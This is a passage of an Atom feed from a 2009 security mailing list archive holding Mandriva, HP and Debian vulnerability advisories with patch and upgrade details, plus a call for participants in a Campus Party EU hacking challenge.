&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0791&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0791&lt;/a&gt;&lt;br&gt;&amp;nbsp;&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3605&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3605&lt;/a&gt;&lt;br&gt;&amp;nbsp;&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3608&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3608&lt;/a&gt;&lt;br&gt;&amp;nbsp;&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3609&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3609&lt;/a&gt;&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Updated Packages:
&lt;br&gt;&lt;br&gt;&amp;nbsp;Corporate 4.0:
&lt;br&gt;&amp;nbsp;4b885bda62ebbeb3cc1bb87b7904c725 &amp;nbsp;corporate/4.0/i586/libpoppler0-0.4.1-3.10.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;ec004634deb8a53b67ed890080d9b3b9 &amp;nbsp;corporate/4.0/i586/libpoppler0-devel-0.4.1-3.10.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;d9c880463e437e43ecf8fc53b03225e1 &amp;nbsp;corporate/4.0/i586/libpoppler-qt0-0.4.1-3.10.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;c7b14c8fb3f0101eb91685379096252a &amp;nbsp;corporate/4.0/i586/libpoppler-qt0-devel-0.4.1-3.10.20060mlcs4.i586.rpm 
&lt;br&gt;&amp;nbsp;287203505cdafc1091000c7c17b5b532 &amp;nbsp;corporate/4.0/SRPMS/poppler-0.4.1-3.10.20060mlcs4.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Corporate 4.0/X86_64:
&lt;br&gt;&amp;nbsp;e8257b84ffe164e374d6134ebc87cdeb &amp;nbsp;corporate/4.0/x86_64/lib64poppler0-0.4.1-3.10.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;578226b19e08f1f4428a63e6b6fb9b66 &amp;nbsp;corporate/4.0/x86_64/lib64poppler0-devel-0.4.1-3.10.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;fc519d68b36219f454a08a87c7493cbf &amp;nbsp;corporate/4.0/x86_64/lib64poppler-qt0-0.4.1-3.10.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;859abd2e604a05f836bb3a3c4ad0948a &amp;nbsp;corporate/4.0/x86_64/lib64poppler-qt0-devel-0.4.1-3.10.20060mlcs4.x86_64.rpm 
&lt;br&gt;&amp;nbsp;287203505cdafc1091000c7c17b5b532 &amp;nbsp;corporate/4.0/SRPMS/poppler-0.4.1-3.10.20060mlcs4.src.rpm
&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;To upgrade automatically use MandrivaUpdate or urpmi. &amp;nbsp;The verification
&lt;br&gt;&amp;nbsp;of md5 checksums and GPG signatures is performed automatically for you.
&lt;br&gt;&lt;br&gt;&amp;nbsp;All packages are signed by Mandriva for security. &amp;nbsp;You can obtain the
&lt;br&gt;&amp;nbsp;GPG public key of the Mandriva Security Team by executing:
&lt;br&gt;&lt;br&gt;&amp;nbsp; gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
&lt;br&gt;&lt;br&gt;&amp;nbsp;You can view other update advisories for Mandriva Linux at:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://www.mandriva.com/security/advisories&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mandriva.com/security/advisories&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp;If you want to report vulnerabilities, please contact
&lt;br&gt;&lt;br&gt;&amp;nbsp; security_(at)_mandriva.com
&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Type Bits/KeyID &amp;nbsp; &amp;nbsp; Date &amp;nbsp; &amp;nbsp; &amp;nbsp; User ID
&lt;br&gt;&amp;nbsp;pub &amp;nbsp;1024D/22458A98 2000-07-10 Mandriva Security Team
&lt;br&gt;&amp;nbsp; &amp;lt;security*mandriva.com&amp;gt;
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.9 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iD8DBQFLKVV4mqjQ0CJFipgRAmfiAJ9prVeHWMfs9wKZ6E/PBbGcY/5B+gCggihx
&lt;br&gt;5dJwIGYG6/HPc817hRImN7A=
&lt;br&gt;=TCNS
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/--MDVSA-2009%3A334---poppler-tp26829657p26829657.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26834158</id>
	<title>Campus Party Eu 2010 Security Challenge - Call For Participants</title>
	<published>2009-12-16T16:34:52Z</published>
	<updated>2009-12-16T16:34:52Z</updated>
	<author>
		<name>Campus Party EU Spain</name>
	</author>
	<content type="html">Greetings,
&lt;br&gt;&lt;br&gt;The Spanish Ministry for Science and Innovation presents in Madrid
&lt;br&gt;from 14th – 18th April, and during the Spanish Presidency of the
&lt;br&gt;European Union, Campus Party Europe
&lt;br&gt;(&lt;a href=&quot;http://www.campus-party.eu/home-en.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.campus-party.eu/home-en.html&lt;/a&gt;) : a special edition of what
&lt;br&gt;is considered the biggest event for technology, creativity and digital
&lt;br&gt;culture online in the world.
&lt;br&gt;&lt;br&gt;For four days, 800 young people from each of the 27 member states of
&lt;br&gt;the EU will participate in activities such as conferences, workshops
&lt;br&gt;and challenges centred around three knowledge areas: Science, Digital
&lt;br&gt;Creativity and Innovation.
&lt;br&gt;&lt;br&gt;We, SecurityByDefault.com crew, are going to coordinate the Network
&lt;br&gt;Security Area, which you can find more information on this link :
&lt;br&gt;&lt;a href=&quot;http://www.campus-party.eu/NetworkSecurity.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.campus-party.eu/NetworkSecurity.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;Therefore, and as part of the agenda, we are organizing a hacking
&lt;br&gt;challenge that calls for anyone born in any of the member countries of
&lt;br&gt;the European Union, which is interested in participating in a
&lt;br&gt;challenge as ambitious as this.
&lt;br&gt;&lt;br&gt;We offer:
&lt;br&gt;&lt;br&gt;*) Travel and accommodation fully in charge of the organization (Flight + Hotel)
&lt;br&gt;&lt;br&gt;*) Possibility to interact with other experts of many nationalities
&lt;br&gt;&lt;br&gt;*) Attendance at lectures given by renowned speakers
&lt;br&gt;&lt;br&gt;*) Cash prizes for winners (up to 2,000 € for the winner)
&lt;br&gt;&lt;br&gt;*) The chance to enjoy such an interesting city like Madrid
&lt;br&gt;&lt;br&gt;&lt;br&gt;-- What we are looking for:
&lt;br&gt;&lt;br&gt;The maximum is two people for each member country of the European
&lt;br&gt;Union : &lt;a href=&quot;http://en.wikipedia.org/wiki/European_Union&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://en.wikipedia.org/wiki/European_Union&lt;/a&gt;&lt;br&gt;&lt;br&gt;-- Selection:
&lt;br&gt;&lt;br&gt;To participate, send us a summary (about 30 lines) of the participant
&lt;br&gt;information (birthplace, biography, contests in which you have
&lt;br&gt;previously participated, released papers/tools, etc) written in
&lt;br&gt;english to the following e-mail address:
&lt;br&gt;campuseu_AT_securitybydefault.com
&lt;br&gt;&lt;br&gt;Selection will be made based on purely technical skills, so the better
&lt;br&gt;curriculum, more likely to be chosen.
&lt;br&gt;&lt;br&gt;-- Deadline:
&lt;br&gt;&lt;br&gt;The deadline is 31 January 2010.
&lt;br&gt;&lt;br&gt;-- Contact:
&lt;br&gt;&lt;br&gt;If you have any questions, don't hesitate to contact us :
&lt;br&gt;contacto_AT_securitybydefault.com
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Campus-Party-Eu-2010-Security-Challenge---Call-For-Participants-tp26834158p26834158.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26829407</id>
	<title>[security bulletin] HPSBMA02252 SSRT061258, SSRT061259 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Code Execution</title>
	<published>2009-12-16T16:23:02Z</published>
	<updated>2009-12-16T16:23:02Z</updated>
	<author>
		<name>security-alert</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;SUPPORT COMMUNICATION - SECURITY BULLETIN
&lt;br&gt;&lt;br&gt;Document ID: c01124817
&lt;br&gt;Version: 1
&lt;br&gt;&lt;br&gt;HPSBMA02252 SSRT061258, SSRT061259 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Code Execution
&lt;br&gt;&lt;br&gt;NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
&lt;br&gt;&lt;br&gt;Release Date: 2009-12-16
&lt;br&gt;Last Updated: 2009-12-16
&lt;br&gt;&lt;br&gt;Potential Security Impact: Remote execution of arbitrary code
&lt;br&gt;&lt;br&gt;Source: Hewlett-Packard Company, HP Software Security Response Team
&lt;br&gt;&lt;br&gt;VULNERABILITY SUMMARY
&lt;br&gt;Potential security vulnerabilities have been identified with HP OpenView Storage Data Protector running on HP-UX, Windows, Linux and Solaris. These vulnerabilities could be exploited remotely to execute arbitrary code.
&lt;br&gt;&lt;br&gt;References: CVE-2007-2280, CVE-2007-2281
&lt;br&gt;&lt;br&gt;SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
&lt;br&gt;HP OpenView Data Protector Application Recovery Manager v5.50 and v6.0
&lt;br&gt;&lt;br&gt;BACKGROUND
&lt;br&gt;&lt;br&gt;CVSS 2.0 Base Metrics
&lt;br&gt;===========================================================
&lt;br&gt;&amp;nbsp; Reference &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Base Vector &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Base Score
&lt;br&gt;CVE-2007-2280 &amp;nbsp; &amp;nbsp;(AV:N/AC:L/Au:N/C:C/I:C/A:C) &amp;nbsp; &amp;nbsp; &amp;nbsp; 10.0
&lt;br&gt;CVE-2007-2281 &amp;nbsp; &amp;nbsp;(AV:N/AC:L/Au:N/C:C/I:C/A:C) &amp;nbsp; &amp;nbsp; &amp;nbsp; 10.0
&lt;br&gt;===========================================================
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Information on CVSS is documented
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; in HP Customer Notice: HPSN-2008-002
&lt;br&gt;&lt;br&gt;The Hewlett-Packard Company thanks Tenable Network Security working with the TippingPoint Zero Day Initiative and Pedram Amini and Aaron Portnoy, both of TippingPoint DV Labs for reporting these vulnerabilities to &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26829407&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security-alert@...&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;RESOLUTION
&lt;br&gt;&lt;br&gt;HP has provided the following patches to resolve these vulnerabilities.
&lt;br&gt;The patches are available from the following location
&lt;br&gt;&lt;br&gt;URL &lt;a href=&quot;http://itrc.hp.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://itrc.hp.com&lt;/a&gt;&lt;br&gt;&lt;br&gt;Operating System/Description/Patch ID
&lt;br&gt;&lt;br&gt;B.11.11, B.11.23, B.11.31 (PA)
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP6.0 (Cell Server)
&lt;br&gt;&amp;nbsp; &amp;nbsp; PHSS_36588
&lt;br&gt;&lt;br&gt;B.11.11, B.11.23, B.11.31 (PA)
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP6.0 (Core)
&lt;br&gt;&amp;nbsp; &amp;nbsp; PHSS_36622
&lt;br&gt;&lt;br&gt;B.11.23, B.11.31 (IA-64)
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP6.0 (Cell Server)
&lt;br&gt;&amp;nbsp; &amp;nbsp; PHSS_36589
&lt;br&gt;&lt;br&gt;B.11.23, B.11.31 (IA-64)
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP6.0 (Core)
&lt;br&gt;&amp;nbsp; &amp;nbsp; PHSS_36623
&lt;br&gt;&lt;br&gt;B.11.11, B.11.23 (PA)
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP5.50 (Cell Server)
&lt;br&gt;&amp;nbsp; &amp;nbsp; PHSS_36799
&lt;br&gt;&lt;br&gt;B.11.11, B.11.23 (PA)
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP5.50 (Core)
&lt;br&gt;&amp;nbsp; &amp;nbsp; PHSS_37382
&lt;br&gt;&lt;br&gt;B.11.23 (IA-64)
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP5.50 (Cell Server)
&lt;br&gt;&amp;nbsp; &amp;nbsp; PHSS_36800
&lt;br&gt;&lt;br&gt;B.11.23 (IA-64)
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP5.50 (Core)
&lt;br&gt;&amp;nbsp; &amp;nbsp; PHSS_37383
&lt;br&gt;&lt;br&gt;Solaris 2.8, 2.9, 2.10
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP6.0 (Cell Server)
&lt;br&gt;&amp;nbsp; &amp;nbsp; DPSOL_00290
&lt;br&gt;&lt;br&gt;Solaris 2.8, 2.9, 2.10
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP6.0 (Core)
&lt;br&gt;&amp;nbsp; &amp;nbsp; DPSOL_00294
&lt;br&gt;&lt;br&gt;Solaris 2.7, 2.8, 2.9
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP5.50 (Cell Server)
&lt;br&gt;&amp;nbsp; &amp;nbsp; DPSOL_00300
&lt;br&gt;&lt;br&gt;Solaris 2.7, 2.8, 2.9
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP5.50 (Core)
&lt;br&gt;&amp;nbsp; &amp;nbsp; DPSOL_00321
&lt;br&gt;&lt;br&gt;RedHat 4AS-x86_64, RedHat 4ES-x86_64
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP6.0 (Cell Server)
&lt;br&gt;&amp;nbsp; &amp;nbsp; DPLNX_00025
&lt;br&gt;&lt;br&gt;RedHat 4AS-x86_64, RedHat 4ES-x86_64
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP6.0 (Core)
&lt;br&gt;&amp;nbsp; &amp;nbsp; DPLNX_00029
&lt;br&gt;&lt;br&gt;Windows 2000/2003/XP
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP6.0 (Cell Server)
&lt;br&gt;&amp;nbsp; &amp;nbsp; DPWIN_00337
&lt;br&gt;&lt;br&gt;Windows 2000/2003/XP
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP6.0 (Core)
&lt;br&gt;&amp;nbsp; &amp;nbsp; DPWIN_00329
&lt;br&gt;&lt;br&gt;Windows 2000/2003/XP
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP5.50 (Cell Server)
&lt;br&gt;&amp;nbsp; &amp;nbsp; DPWIN_00208
&lt;br&gt;&lt;br&gt;Windows 2000/2003/XP
&lt;br&gt;&amp;nbsp; &amp;nbsp; OV DP5.50 (Core)
&lt;br&gt;&amp;nbsp; &amp;nbsp; DPWIN_00359
&lt;br&gt;&lt;br&gt;MANUAL ACTIONS: No
&lt;br&gt;&lt;br&gt;PRODUCT SPECIFIC INFORMATION
&lt;br&gt;&lt;br&gt;HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: &lt;a href=&quot;https://www.hp.com/go/swa&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://www.hp.com/go/swa&lt;/a&gt;&lt;br&gt;&lt;br&gt;The following text is for use by the HP-UX Software Assistant.
&lt;br&gt;&lt;br&gt;AFFECTED VERSIONS
&lt;br&gt;&lt;br&gt;For OV DP6.0, PA-RISC
&lt;br&gt;&lt;br&gt;HP-UX B.11.11, B.11.23, B.11.31
&lt;br&gt;==================
&lt;br&gt;DATA-PROTECTOR.OMNI-CS
&lt;br&gt;action: install PHSS_36588 or subsequent
&lt;br&gt;action: install PHSS_36622 or subsequent
&lt;br&gt;&lt;br&gt;For OV DP6.0, IA-64
&lt;br&gt;HP-UX B.11.23, B.11.31
&lt;br&gt;==================
&lt;br&gt;DATA-PROTECTOR.OMNI-CS
&lt;br&gt;action: install PHSS_36589 or subsequent
&lt;br&gt;action: install PHSS_36623 or subsequent
&lt;br&gt;&lt;br&gt;For OV DP5.50, PA-RISC
&lt;br&gt;&lt;br&gt;HP-UX B.11.11, B.11.23
&lt;br&gt;==================
&lt;br&gt;DATA-PROTECTOR.OMNI-CS
&lt;br&gt;action: install PHSS_36799 or subsequent
&lt;br&gt;action: install PHSS_37382 or subsequent
&lt;br&gt;&lt;br&gt;For OV DP5.50, IA-64
&lt;br&gt;HP-UX B.11.23
&lt;br&gt;==================
&lt;br&gt;DATA-PROTECTOR.OMNI-CS
&lt;br&gt;action: install PHSS_36800 or subsequent
&lt;br&gt;action: install PHSS_37383 or subsequent
&lt;br&gt;&lt;br&gt;END AFFECTED VERSIONS
&lt;br&gt;&lt;br&gt;HISTORY
&lt;br&gt;Version:1 (rev.1) 16 December 2009 Initial release
&lt;br&gt;&lt;br&gt;Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
&lt;br&gt;&lt;br&gt;Support: For further information, contact normal HP Services support channel.
&lt;br&gt;&lt;br&gt;Report: To report a potential security vulnerability with any HP supported product, send Email to: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26829407&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security-alert@...&lt;/a&gt;
&lt;br&gt;It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
&lt;br&gt;To get the security-alert PGP key, please send an e-mail message as follows:
&lt;br&gt;&amp;nbsp; To: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26829407&amp;i=2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security-alert@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; Subject: get key
&lt;br&gt;Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
&lt;br&gt;&lt;a href=&quot;http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC&lt;/a&gt;&lt;br&gt;On the web page: ITRC security bulletins and patch sign-up
&lt;br&gt;Under Step1: your ITRC security bulletins and patches
&lt;br&gt;&amp;nbsp; &amp;nbsp; -check ALL categories for which alerts are required and continue.
&lt;br&gt;Under Step2: your ITRC operating systems
&lt;br&gt;&amp;nbsp; &amp;nbsp; -verify your operating system selections are checked and save.
&lt;br&gt;&lt;br&gt;To update an existing subscription: &lt;a href=&quot;http://h30046.www3.hp.com/subSignIn.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://h30046.www3.hp.com/subSignIn.php&lt;/a&gt;&lt;br&gt;Log in on the web page: Subscriber's choice for Business: sign-in.
&lt;br&gt;On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
&lt;br&gt;&lt;br&gt;To review previously published Security Bulletins visit: &lt;a href=&quot;http://www.itrc.hp.com/service/cki/secBullArchive.do&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.itrc.hp.com/service/cki/secBullArchive.do&lt;/a&gt;&lt;br&gt;&lt;br&gt;* The Software Product Category that this Security Bulletin
&lt;br&gt;relates to is represented by the 5th and 6th characters
&lt;br&gt;of the Bulletin number in the title:
&lt;br&gt;&lt;br&gt;GN = HP General SW
&lt;br&gt;MA = HP Management Agents
&lt;br&gt;MI = Misc. 3rd Party SW
&lt;br&gt;MP = HP MPE/iX
&lt;br&gt;NS = HP NonStop Servers
&lt;br&gt;OV = HP OpenVMS
&lt;br&gt;PI = HP Printing &amp; Imaging
&lt;br&gt;ST = HP Storage SW
&lt;br&gt;TL = HP Trusted Linux
&lt;br&gt;TU = HP Tru64 UNIX
&lt;br&gt;UX = HP-UX
&lt;br&gt;VV = HP VirtualVault
&lt;br&gt;&lt;br&gt;System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
&lt;br&gt;&lt;br&gt;&amp;quot;HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.&amp;quot;
&lt;br&gt;&lt;br&gt;Copyright 2009 Hewlett-Packard Development Company, L.P.
&lt;br&gt;Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided &amp;quot;as is&amp;quot; without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.10 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iEYEARECAAYFAkspcYEACgkQ4B86/C0qfVkItgCg9uk6tgF3cfRS7sNf++8iiDZ8
&lt;br&gt;+zkAoLsnNDMz83rozws++rOLuTlz18Y1
&lt;br&gt;=qxAw
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-security-bulletin--HPSBMA02252-SSRT061258%2C-SSRT061259-rev.1---HP-OpenView-Storage-Data-Protector%2C-Remote-Arbitrary-Code-Execution-tp26829407p26829407.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26819122</id>
	<title>[SECURITY] [DSA 1956-1] New xulrunner packages fix several vulnerabilities</title>
	<published>2009-12-16T13:15:39Z</published>
	<updated>2009-12-16T13:15:39Z</updated>
	<author>
		<name>Moritz Muehlenhoff-2</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;Debian Security Advisory DSA-1956-1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26819122&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security@...&lt;/a&gt;
&lt;br&gt;&lt;a href=&quot;http://www.debian.org/security/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Moritz Muehlenhoff
&lt;br&gt;December 16, 2009 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.debian.org/security/faq&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/faq&lt;/a&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Package &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;: xulrunner
&lt;br&gt;Vulnerability &amp;nbsp;: several
&lt;br&gt;Problem type &amp;nbsp; : remote
&lt;br&gt;Debian-specific: no
&lt;br&gt;CVE Id(s) &amp;nbsp; &amp;nbsp; &amp;nbsp;: CVE-2009-3986 CVE-2009-3985 CVE-2009-3984 CVE-2009-3983 CVE-2009-3981 CVE-2009-3979
&lt;br&gt;&lt;br&gt;Several remote vulnerabilities have been discovered in Xulrunner, a
&lt;br&gt;runtime environment for XUL applications, such as the Iceweasel web
&lt;br&gt;browser. The Common Vulnerabilities and Exposures project identifies
&lt;br&gt;the following problems:
&lt;br&gt;&lt;br&gt;CVE-2009-3986:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;David James discovered that the window.opener property allows Chrome
&lt;br&gt;&amp;nbsp; &amp;nbsp;privilege escalation.
&lt;br&gt;&lt;br&gt;CVE-2009-3985:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Jordi Chanel discovered a spoofing vulnerability of the URL location bar 
&lt;br&gt;&amp;nbsp; &amp;nbsp;using the document.location property.
&lt;br&gt;&lt;br&gt;CVE-2009-3984:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Jonathan Morgan discovered that the icon indicating a secure connection
&lt;br&gt;&amp;nbsp; &amp;nbsp;could be spoofed through the document.location property.
&lt;br&gt;&lt;br&gt;CVE-2009-3983:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Takehiro Takahashi discovered that the NTLM implementaion is vulnerable
&lt;br&gt;&amp;nbsp; &amp;nbsp;to reflection attacks.
&lt;br&gt;&lt;br&gt;CVE-2009-3981:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Jesse Ruderman discovered a crash in the layout engine, which might allow
&lt;br&gt;&amp;nbsp; &amp;nbsp;the execution of arbitrary code.
&lt;br&gt;&lt;br&gt;CVE-2009-3979:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Jesse Ruderman, Josh Soref, Martijn Wargers, Jose Angel and Olli Pettay
&lt;br&gt;&amp;nbsp; &amp;nbsp;discovered crashes in the layout engine, which might allow the execution
&lt;br&gt;&amp;nbsp; &amp;nbsp;of arbitrary code.
&lt;br&gt;&lt;br&gt;For the stable distribution (lenny), these problems have been fixed in 
&lt;br&gt;version 1.9.0.16-1.
&lt;br&gt;&lt;br&gt;For the unstable distribution (sid), these problems have been fixed in
&lt;br&gt;version 1.9.1.6-1.
&lt;br&gt;&lt;br&gt;We recommend that you upgrade your xulrunner packages.
&lt;br&gt;&lt;br&gt;Upgrade instructions
&lt;br&gt;- --------------------
&lt;br&gt;&lt;br&gt;wget url
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will fetch the file for you
&lt;br&gt;dpkg -i file.deb
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will install the referenced file.
&lt;br&gt;&lt;br&gt;If you are using the apt-get package manager, use the line for
&lt;br&gt;sources.list as given below:
&lt;br&gt;&lt;br&gt;apt-get update
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will update the internal database
&lt;br&gt;apt-get upgrade
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will install corrected packages
&lt;br&gt;&lt;br&gt;You may use an automated update by adding the resources from the
&lt;br&gt;footer to the proper configuration.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Debian GNU/Linux 5.0 alias lenny
&lt;br&gt;- --------------------------------
&lt;br&gt;&lt;br&gt;Stable updates are available for alpha, amd64, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
&lt;br&gt;&lt;br&gt;Source archives:
